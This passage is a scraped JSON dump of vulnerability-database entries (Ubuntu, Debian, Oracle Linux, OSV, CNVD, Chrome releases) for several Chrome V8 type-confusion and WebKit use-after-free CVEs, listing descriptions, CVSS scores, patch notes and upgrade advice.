\n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T00:00:00", "type": "ubuntucve", "title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-07-26T00:00:00", "id": "UB:CVE-2022-1364", "href": "https://ubuntu.com/security/CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:30:37", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage. 
(Chromium security severity: High)\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T00:00:00", "type": "ubuntucve", "title": "CVE-2022-4262", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-02T00:00:00", "id": "UB:CVE-2022-4262", "href": "https://ubuntu.com/security/CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:38:18", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu 
\n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-07-23T00:00:00", "id": "UB:CVE-2022-1096", "href": "https://ubuntu.com/security/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-09T13:21:22", "description": "A flaw was found in the WebKitGTK package. An improper input validation\nissue may lead to a use-after-free vulnerability. This flaw allows\nattackers with network access to pass specially crafted web content files,\ncausing a denial of service or arbitrary code execution. 
This CVE exists\nbecause of a CVE-2023-28205 security regression for the WebKitGTK package\nin Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=2188543>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8 \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | This CVE is specific to Red Hat's webkitgtk package, Ubuntu is not vulnerable to this issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T00:00:00", "type": "ubuntucve", "title": "CVE-2023-2203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-17T00:00:00", "id": "UB:CVE-2023-2203", "href": "https://ubuntu.com/security/CVE-2023-2203", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-11-08T18:32:18", "description": "A use after free issue was addressed with 
improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T19:15:00", "type": "debiancve", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-10T19:15:00", "id": "DEBIANCVE:CVE-2023-28205", "href": "https://security-tracker.debian.org/tracker/CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-30T18:21:19", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T19:15:09", "type": "debiancve", "title": "CVE-2023-2033", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-14T19:15:09", "id": "DEBIANCVE:CVE-2023-2033", "href": "https://security-tracker.debian.org/tracker/CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:47", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T23:15:00", "type": "debiancve", "title": "CVE-2022-3723", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-11-01T23:15:00", "id": "DEBIANCVE:CVE-2022-3723", "href": "https://security-tracker.debian.org/tracker/CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:46", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T22:15:00", "type": "debiancve", 
"title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-07-26T22:15:00", "id": "DEBIANCVE:CVE-2022-1364", "href": "https://security-tracker.debian.org/tracker/CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:47", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T21:15:00", "type": "debiancve", "title": "CVE-2022-4262", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-02T21:15:00", "id": "DEBIANCVE:CVE-2022-4262", "href": "https://security-tracker.debian.org/tracker/CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:22:46", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "debiancve", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-07-23T00:15:00", "id": "DEBIANCVE:CVE-2022-1096", "href": "https://security-tracker.debian.org/tracker/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-11T02:29:28", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. 
This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T22:15:00", "type": "debiancve", "title": "CVE-2023-2203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-17T22:15:00", "id": "DEBIANCVE:CVE-2023-2203", "href": "https://security-tracker.debian.org/tracker/CVE-2023-2203", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2023-11-01T19:20:30", "description": "[2.36.7-1.3]\n- Add patch for CVE-2023-28205\n Resolves: #2185744", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "oraclelinux", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T00:00:00", "id": "ELSA-2023-1918", "href": "http://linux.oracle.com/errata/ELSA-2023-1918.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-01T19:20:32", "description": "[2.36.7-1.3]\n- Add patch for CVE-2023-28205\n Resolves: #2185740", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "oraclelinux", "title": "webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-20T00:00:00", "id": "ELSA-2023-1919", "href": "http://linux.oracle.com/errata/ELSA-2023-1919.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-04-16T23:04:57", "description": "\nMultiple security issues were discovered in Chromium, which could result\nin the execution of arbitrary code.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 112.0.5615.121-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {}, "published": "2023-04-16T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-16T23:04:55", "id": "OSV:DSA-5390-1", "href": "https://osv.dev/vulnerability/DSA-5390-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T07:20:59", "description": "\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 100.0.4896.127-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-04-16T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2022-08-10T07:20:53", "id": "OSV:DSA-5121-1", "href": "https://osv.dev/vulnerability/DSA-5121-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-05T18:09:50", "description": "\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 108.0.5359.94-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-04T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T01:59:30", "id": "OSV:DSA-5295-1", "href": "https://osv.dev/vulnerability/DSA-5295-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T07:07:11", "description": "\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary 
code if a malicious website is visited.\n\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 99.0.4844.84-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2022-08-10T07:07:10", "id": "OSV:DSA-5110-1", "href": "https://osv.dev/vulnerability/DSA-5110-1", "cvss": {"score": 0.0, "vector": "NONE"}}], "cnvd": [{"lastseen": "2023-04-19T05:29:18", "description": "Chrome is a free and fast Internet browser software developed by Google, Inc. with the goal of making Google Chrome is based on the more powerful JavaScript V8 Google Chrome is based on the more powerful JavaScript V8 engine, which improves the browser's processing speed. It supports multi-tab browsing, with each tab page running in a separate \"sandbox\". Each tabbed page runs in a separate \"sandbox. 
A type obfuscation vulnerability exists in Google Chrome V8, which can be exploited to execute arbitrary code in the context of an application by tricking users into opening malicious links.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-17T00:00:00", "type": "cnvd", "title": "Google Chrome V8 Type Obfuscation Vulnerability (CNVD-2023-28127)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-17T00:00:00", "id": "CNVD-2023-28127", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-28127", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-06T11:23:22", "description": "Google Chrome is a web browser from Google, Inc. 
A security vulnerability exists in Google Chrome that could be exploited by attackers to execute arbitrary code or cause a denial of service on a system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-31T00:00:00", "type": "cnvd", "title": "Google Chrome V8 Code Execution Vulnerability (CNVD-2022-85092)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-12-06T00:00:00", "id": "CNVD-2022-85092", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-85092", "cvss": {"score": 0.0, "vector": "NONE"}}], "chrome": [{"lastseen": "2023-12-01T02:12:28", "description": "The Stable and extended stable channel has been updated to 112.0.5615.121 for Windows Mac and Linux which will roll out over the coming days/weeks. A full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/112.0.5615.86..112.0.5615.121?pretty=fuller&n=10000>).\n\n\n\n\n\nM112 Stable Update for Desktop - v112.0.5615.121 \n\nSecurity Fixes and Rewards \n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed. \n\n\nThis update includes [2](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M112>) security fixes. Below, we highlight fixes that were contributed by external researchers. 
